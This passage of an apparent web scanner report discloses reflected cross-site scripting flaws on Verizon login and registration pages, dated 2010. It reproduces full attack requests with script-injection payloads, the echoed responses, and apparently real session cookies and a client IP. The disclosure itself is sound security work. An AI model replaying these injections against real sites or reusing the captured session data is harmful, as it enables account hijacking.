The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:55:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target">
...[SNIP]...

3.113. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A02V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Sat, 20 Nov 2010 00:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:50 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target">
...[SNIP]...

3.114. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a916'-alert(1)-'a4883ee17a5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CP=null*; myservices=vzdock=N; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:14:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:42 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:19:42 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133609

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
ipt">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();
}
...[SNIP]...

3.115. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc9f'-alert(1)-'ea90d6efe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:13:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:50 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:18:50 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133536

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

3.116. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64661
Expires: Sat, 20 Nov 2010 00:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<script language ="javascript">

// for check Availabiltity
var BannerID = "BannerDry1m55d47";6993170f2f3";    
var xmlSource = "<PROMOBANNERS>
...[SNIP]...

3.117. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b710b"><script>alert(1)</script>55aa320ee52 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Sat, 20 Nov 2010 02:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:39:02 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52"/>
...[SNIP]...

3.118. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx

Issue detail

The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 89a05%0aalert(1)//cc561db1e96 was submitted in the FlowRoute parameter. This input was echoed as 89a05
alert(1)//cc561db1e96
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx?FlowRoute=NB-NS89a05%0aalert(1)//cc561db1e96 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22604
Expires: Sat, 20 Nov 2010 02:33:26 GMT
